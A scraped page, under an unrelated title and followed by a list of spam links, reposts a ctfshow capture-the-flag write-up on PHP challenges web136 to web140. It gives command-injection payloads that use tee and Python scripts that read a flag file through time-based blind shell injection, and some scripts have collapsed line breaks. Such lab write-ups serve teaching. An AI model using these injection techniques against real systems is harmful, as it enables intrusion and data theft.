当前位置: 首页 > news >正文

b2b网站平台大全微信管理工具

b2b网站平台大全,微信管理工具,佳木斯建设网站,惠州私人做网站联系人1.web136 还有一种写文件的命令时tee命令 payload&#xff1a; : ls /|tee 1 访问1下载查看文件1发现根目录下有flag cat /f149_15_h3r3|tee 2 访问下载查看文件22.web137 call_user_func <?php class myclass {static function say_hello(){echo "He…

1.web136

在这里插入图片描述
还有一种写文件的命令时tee命令
payload:

: ls /|tee 1           访问1下载查看文件1发现根目录下有flag
cat /f149_15_h3r3|tee 2     访问下载查看文件2

2.web137

在这里插入图片描述
call_user_func

<?php
class myclass {static function say_hello(){echo "Hello!\n";}
}
$classname = "myclass";
call_user_func(array($classname, 'say_hello'));
call_user_func($classname .'::say_hello'); 
?>

payload:

 ctfshow=ctfshow::getFlag

3.web138

在这里插入图片描述
过滤了:
还可以传入数组
payload:

ctfshow[0]=ctfshow&ctfshow[1]=getFlag

4.web139

在这里插入图片描述
发现tee写文件不行了,应该时权限不够
使用盲注的方式,跟sql的时间盲注差不多,这里利用的时linux的shell语法

import requests
import time
import string
str=string.ascii_letters+string.digits
result=""
for i in range(1,5):         #知道flag在第四行,实际情况中把数字写大一些key=0for j in range(1,15):     #文件名的长度大小if key==1:breakfor n in str:payload="if [ `ls /|awk 'NR=={0}'|cut -c {1}` == {2} ];then sleep 3;fi".format(i,j,n)#print(payload)url="http://877848b4-f5ed-4ec1-bfc1-6f44bf292662.chall.ctf.show?c="+payloadtry:requests.get(url,timeout=(2.5,2.5))except:result=result+nprint(result)breakif n=='9':key=1result+=" "
得出flag在根目录下的f149_15_h3r3中,继续盲注得出flag值
import requests
import time
import string
str=string.digits+string.ascii_lowercase+"-"
result=""
#key=0                      #key我感觉可以不用加
for j in range(1,45):
#	if key==1:
#		break   for n in str:payload="if [ `cat /f149_15_h3r3|cut -c {0}` == {1} ];then sleep 3;fi".format(j,n)#print(payload)url="http://877848b4-f5ed-4ec1-bfc1-6f44bf292662.chall.ctf.show?c="+payloadtry:requests.get(url,timeout=(2.5,2.5))except:result=result+nprint(result)break

awk nr从第几行开始
在这里插入图片描述
cut截取字符第几个字符
在这里插入图片描述

5.web140

在这里插入图片描述
弱类型比较,intval把非零数字转为0,而后面的ctfshow会进行类型转换,也会转换为0
payload:

f1=md5&f2=md5
f1=usleep&f2=usleep
f1=md5&f2=sleep
f1=sha1&f2=md5

php特性

http://www.yidumall.com/news/24081.html

相关文章:

  • css查询错误网站珠海优化seo
  • 深圳网站建设 网站设计推广链接怎么制作
  • 北京建设部幼儿园网站武汉网站排名推广
  • 制作网站案例网址网络营销推广方案策划与实施
  • 公司做网站的价格几千元南宁网络推广品牌
  • wordpress移动主菜单页面关键词优化
  • 用织梦做模板网站百度客户端官网
  • 苏中建设 官方网站推广软文怎么写样板
  • 山西网站建设排名长沙 建站优化
  • wordpress柚子皮青岛seo霸屏
  • 陕西天工建设有限公司官方网站百度广告推广平台
  • 网站域名备案服务成都百度关键词排名
  • 宁波网站公司哪家好seo管理系统培训
  • 南昌建网站做优化公司电商培训机构哪家强
  • 深圳市网站设计公平台推广计划
  • 网站建设的提升营销推广方案ppt案例
  • 网络营销和电子商务的不同seo管理系统培训运营
  • 怎么去创建一个网站视频推广平台
  • ui设计网上培训课程seo是什么岗位的缩写
  • 校园网站建设 必要性分析广告公司是做什么的
  • 做图模板网站有哪些公关公司排行榜
  • 做网站与网店运营建立网站的几个步骤
  • 盘锦网站开发做教育培训应该注册什么公司
  • 公众号做视频网站企业官网
  • 手机网站用户体验百度客服人工电话24小时
  • 手机网站大全推荐设计网站的公司
  • 免费公司宣传视频制作软件关键词seo优化排名
  • 重庆建网站诚选快忻科技悉心百度网站怎么优化排名靠前
  • 做个网站多少钱怎么接广告app推广怎么做
  • 自己的网站怎样做优化上海营销公司